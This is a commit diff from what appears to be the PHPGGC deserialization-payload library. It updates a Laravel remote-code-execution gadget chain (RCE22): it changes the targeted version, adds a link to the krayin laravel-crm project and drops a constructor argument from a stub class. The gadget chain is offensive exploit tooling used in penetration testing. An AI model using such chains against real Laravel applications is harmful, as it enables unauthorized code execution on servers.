File tree 2 files changed +3
-5
lines changed
gadgetchains/Laravel/RCE/22 2 files changed +3
-5
lines changed Original file line number Diff line number Diff line change 4
4
5
5
class RCE22 extends \PHPGGC \GadgetChain \RCE \FunctionCall
6
6
{
7
- public static $ version = '5.1.* ' ;
7
+ public static $ version = '2.0.2+ ' ;
8
8
public static $ vector = '__destruct ' ;
9
9
public static $ author = 'mcdruid ' ;
10
+ public static $ information = 'https://github.com/krayin/laravel-crm ' ;
10
11
11
12
public function generate (array $ parameters )
12
13
{
@@ -15,7 +16,6 @@ public function generate(array $parameters)
15
16
16
17
return new \Illuminate \Broadcasting \PendingBroadcast (
17
18
new \League \CommonMark \Environment \Environment (
18
- $ function ,
19
19
new \League \CommonMark \Util \PrioritizedList (
20
20
new \League \CommonMark \Event \ListenerData (
21
21
new \Illuminate \Support \Testing \Fakes \ChainedBatchTruthTest (
Original file line number Diff line number Diff line change @@ -17,11 +17,9 @@ function __construct($events, $event)
17
17
namespace League \CommonMark \Environment {
18
18
class Environment {
19
19
private bool $ extensionsInitialized = true ;
20
- private $ listener ;
21
20
private $ listenerData ; // private PrioritizedList $listenerData;
22
21
23
- function __construct ($ listener , $ listenerData ) {
24
- $ this ->listener = $ listener ;
22
+ function __construct ($ listenerData ) {
25
23
$ this ->listenerData = $ listenerData ;
26
24
}
27
25
}
You can’t perform that action at this time.
0 commit comments